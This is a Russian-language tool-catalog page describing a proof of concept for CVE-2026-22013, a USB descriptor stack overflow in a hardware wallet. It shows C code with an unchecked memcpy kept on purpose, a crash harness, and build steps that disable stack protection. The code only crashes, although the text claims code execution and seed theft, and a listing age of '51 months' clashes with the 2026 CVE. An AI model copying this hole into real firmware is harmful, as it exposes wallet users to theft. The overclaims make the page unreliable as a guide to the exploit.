Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — PoC переполнения буфера стека для парсера USB-дескрипторов аппаратного кошелька (CVE-2026-22013), демонстрирующий перезапись обратного адреса и выполнение кода через чрезмерно большой payload GET_DESCRIPTOR. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
Безопасность встроенных системАнализ уязвимостейЭксплуатацияАппаратный ХакингАппаратная БезопасностьЭксплуатация Бинарных Файлов
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC переполнения буфера стека для парсера USB-дескрипторов аппаратного кошелька (CVE-2026-22013), демонстрирующий перезапись обратного адреса и выполнение кода через чрезмерно большой payload GET_DESCRIPTOR.

Репозиторий
51 месяц назадЕщё не проверено

CVE-2026-22013 – Переполнение буфера USB-дескриптора аппаратного кошелька

Код программы (C-симуляция прошивки)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – Переполнение буфера USB-дескриптора аппаратного кошелька

Severity: Critical

Обзор

USB-стек аппаратного кошелька содержит переполнение буфера стека при обработке запроса GET_DESCRIPTOR с полезной нагрузкой слишком большого размера. Злоумышленник, имеющий физический доступ к USB-порту, может использовать эту уязвимость для перезаписи обратного адреса и получения возможности выполнять код, извлекая seed-фразы.

Детали уязвимости

  • Тип: Переполнение буфера стека
  • Воздействие: Полная компрометация устройства, извлечение seed-фраз.
  • Корневая причина: Поле длины дескриптора не проверяется перед копированием в буфер фиксированного размера.

Демонстрация эксплойта

Скомпилируйте для целевой архитектуры и запустите (симуляция):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

Программа завершается с ошибкой из-за повреждения стека.

Скачать инструмент